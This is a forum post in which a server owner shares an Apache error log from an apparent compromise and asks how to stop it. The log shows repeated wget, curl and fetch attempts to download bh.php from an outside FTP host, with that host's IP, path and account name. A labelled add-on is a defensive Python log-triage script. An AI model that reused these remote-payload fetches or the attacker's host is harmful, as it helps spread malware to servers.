My server is fetching a virus :(

Chrome Orange (Verified User; joined Feb 7, 2007; 6 messages)
So tonight my server restarted the httpd service and it failed (looks like it was the log rotation script). In trying to find out why it didn't restart I looked at the error logs. The first one I opened was the Apache error log and I found this in there.

It looks like my server is FTPing to another server and is getting bh.php then trying to run it!

The files (bh.php etc) were in my tmp folder, I wasn't able to edit them - antivirus software kicking in - so I deleted them.

My question: how do I stop my server from doing it again? There are other entries further down the log file but, because ssh is normally off, nothing actually ran.

Thanks in advance

---------- LOG --------------
[Wed Nov 30 19:41:21 2011] [warn] [client 67.220.101.136] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
perl: no process killed
perl: no process killed
--19:46:24-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php'
Connecting to 209.216.202.122:21... --19:46:24-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... Logged in!
==> SYST ... done. ==> PWD ... done. ==> PWD ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.

0K ..done.
bh.php has sprung into existence.
Retrying.

........ .......... .......... .. 67.28 KB/s

19:46:27 (67.28 KB/s) - `bh.php' saved [33621]

--19:46:27-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.1'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

8 33621 8 2896 0 0 1510 0 0:00:22 0:00:01 0:00:21 1510done.

0K .......... .......... .......... .. 65.93 KB/s


100 33621 100 33621 0 0 13153 0 0:00:02 0:00:02 --:--:-- 48082
19:46:29 (65.93 KB/s) - `bh.php.1' saved [33621]

sh: fetch: command not found
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

8 33621 8 2896 0 0 1400 0 0:00:24 0:00:02 0:00:22 1400
100 33621 100 33621 0 0 12202 0 0:00:02 0:00:02 --:--:-- 44723
sh: fetch: command not found
--19:46:44-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.2'
Connecting to 209.216.202.122:21... perl: no process killed
--19:46:44-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.2'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... Logged in!
==> SYST ... done. ==> PWD ... done. ==> PWD ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.

0K ..done.
bh.php.2 has sprung into existence.
Retrying.

........ .......... .......... ..perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... perl: no process killed
--19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
=> `bh.php.3'
Connecting to 209.216.202.122:21... --19:46:47-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.3'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... connected.
Logging in as a1539_Contact101 ... 25.06 KB/s

Logged in!
==> SYST ... Logged in!
==> SYST ... 19:46:47 (25.06 KB/s) - `bh.php.2' saved [33621]

done. ==> PWD ... done. ==> PWD ... Logged in!
==> SYST ... Logged in!
==> SYST ... done.
==> TYPE I ... done.
==> TYPE I ... done. ==> PWD ... done. ==> PWD ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> TYPE I ... done.
==> TYPE I ... done.
==> PASV ... done.
==> PASV ... done. ==> CWD /la ... done. ==> CWD /la ... done.
==> PASV ... done.
==> PASV ... done. ==> RETR bh.php ... done. ==> RETR bh.php ... done.

0K ..done.
bh.php.3 has sprung into existence.
Retrying.

done. ==> RETR bh.php ... done. ==> RETR bh.php ... ......done.
bh.php.3 has sprung into existence.
Retrying.

done.
bh.php.3 has sprung into existence.
Retrying.

.. .......... .......... .. 66.27 KB/s

19:46:49 (66.27 KB/s) - `bh.php.3' saved [33621]

--19:46:50-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.4'
Connecting to 209.216.202.122:21... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

8 33621 8 2896 0 0 1398 0 0:00:24 0:00:02 0:00:22 1398connected.
Logging in as a1539_Contact101 ... --19:46:50-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 2) => `bh.php.4'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ...
100 33621 100 33621 0 0 12262 0 0:00:02 0:00:02 --:--:-- 45789
done. ==> PWD ... sh: fetch: command not found
Logged in!
==> SYST ... done.
==> TYPE I ... done. ==> PWD ... done. ==> CWD /la ... done.
==> TYPE I ... --19:46:51-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 3) => `bh.php.4'
Connecting to 209.216.202.122:21... done.
==> PASV ... done. ==> CWD /la ... connected.
Logging in as a1539_Contact101 ... done.
==> PASV ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

4 33621 4 1448 0 0 752 0 0:00:44 0:00:01 0:00:43 752done. ==> RETR bh.php ... done.

0K ..done. ==> RETR bh.php ...
30 33621 30 10136 0 0 4502 0 0:00:07 0:00:02 0:00:05 26568......Logged in!
==> SYST ... done.
bh.php.4 has sprung into existence.
Retrying.

.. .........done. ==> PWD ...
100 33621 100 33621 0 0 13058 0 0:00:02 0:00:02 --:--:-- 49496
. .......... .. 68.52 KB/s

done.
==> TYPE I ... sh: fetch: command not found
19:46:52 (68.52 KB/s) - `bh.php.4' saved [33621]

done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.
bh.php.4 has sprung into existence.
Retrying.

--19:46:54-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 3) => `bh.php.5'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... % Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

8 33621 8 2896 0 0 1471 0 0:00:22 0:00:01 0:00:21 1471Logged in!
==> SYST ... done. ==> PWD ...
68 33621 68 23168 0 0 9316 0 0:00:03 0:00:02 0:00:01 38984done.
==> TYPE I ...
100 33621 100 33621 0 0 12690 0 0:00:02 0:00:02 --:--:-- 45051
done. ==> CWD /la ... sh: fetch: command not found
done.
==> PASV ... done. ==> RETR bh.php ... done.

0K .......... .........--19:46:56-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 4) => `bh.php.5'
Connecting to 209.216.202.122:21... . .......... .. 68.55 KB/s

connected.
Logging in as a1539_Contact101 ... 19:46:56 (68.55 KB/s) - `bh.php.5' saved [33621]

Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.
bh.php.5 has sprung into existence.
Retrying.

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

8 33621 8 2896 0 0 1445 0 0:00:23 0:00:02 0:00:21 1445
68 33621 68 23168 0 0 9269 0 0:00:03 0:00:02 0:00:01 40788
100 33621 100 33621 0 0 12605 0 0:00:02 0:00:02 --:--:-- 46203
sh: fetch: command not found
--19:47:01-- ftp://a1539_Contact101:*password*@209.216.202.122/la/bh.php
(try: 5) => `bh.php.6'
Connecting to 209.216.202.122:21... connected.
Logging in as a1539_Contact101 ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /la ... done.
==> PASV ... done. ==> RETR bh.php ... done.

0K .......... .......... .......... .. 63.58 KB/s

19:47:04 (63.58 KB/s) - `bh.php.6' saved [33621]

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

8 33621 8 2896 0 0 1391 0 0:00:24 0:00:02 0:00:22 1391
64 33621 64 21720 0 0 8535 0 0:00:03 0:00:02 0:00:01 40568
100 33621 100 33621 0 0 12371 0 0:00:02 0:00:02 --:--:-- 48233
sh: fetch: command not found
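
An added example, not part of the original post: wget banners, curl progress meters and `sh:` errors in an Apache error log are stderr from processes the web server started, so they can be separated from Apache's own entries and summarised for triage. The function name `triage` and the sample's addresses and credentials are assumptions made for illustration.

```python
import re

# Apache error-log entries start with "[timestamp] [level]"; anything else is
# stderr from a process the web server started (CGI, PHP exec(), etc.).
APACHE_LINE = re.compile(r"^\[[A-Z][a-z]{2} [A-Z][a-z]{2} +\d+ [\d:.]+ \d{4}\] \[[\w:]+\]")
CLIENT = re.compile(r"\[client ([\d.]+)")
WGET_REQ = re.compile(r"--\d\d:\d\d:\d\d--\s+(\S+://\S+)")   # wget request banner
WGET_SAVED = re.compile(r"`([^']+)' saved \[(\d+)\]")        # wget completion line
SHELL_ERR = re.compile(r"sh: (\S+): command not found")
CURL_METER = re.compile(r"% Total\s+% Received")             # curl progress header
CREDS = re.compile(r"(://)[^/@\s]+@")                        # user:pass@ in a URL

def triage(lines):
    """Summarise child-process output embedded in an Apache error log."""
    r = {"last_client": None, "urls": set(), "saved": [],
         "missing_tools": set(), "curl_runs": 0, "foreign_lines": 0}
    for line in lines:
        if APACHE_LINE.match(line):
            m = CLIENT.search(line)
            # Last client logged before the first foreign line: a lead, not proof.
            if m and r["foreign_lines"] == 0:
                r["last_client"] = m.group(1)
            continue
        if not line.strip():
            continue
        r["foreign_lines"] += 1
        for url in WGET_REQ.findall(line):
            r["urls"].add(CREDS.sub(r"\1***@", url))   # never re-log credentials
        r["saved"] += [(n, int(size)) for n, size in WGET_SAVED.findall(line)]
        r["missing_tools"].update(SHELL_ERR.findall(line))
        r["curl_runs"] += bool(CURL_METER.search(line))
    return r

# Constructed sample modelled on the log format in the post; addresses and
# credentials are placeholders (RFC 5737 documentation ranges).
SAMPLE = """\
[Wed Nov 30 19:41:21 2011] [warn] [client 192.0.2.10] mod_include: Options +Includes (or IncludesNoExec) wasn't set, INCLUDES filter removed
perl: no process killed
--19:46:24--  ftp://user:secret@198.51.100.7/la/bh.php
           => `bh.php'
Connecting to 198.51.100.7:21... connected.
19:46:27 (67.28 KB/s) - `bh.php' saved [33621]
  % Total    % Received % Xferd  Average Speed
sh: fetch: command not found
[Wed Nov 30 19:50:02 2011] [error] [client 192.0.2.55] File does not exist: /var/www/html/favicon.ico
""".splitlines()

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The saved file names and the request timestamps give search terms for the access log and for sweeping the temp directory; the client address is only the last one Apache logged before the foreign output began.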
 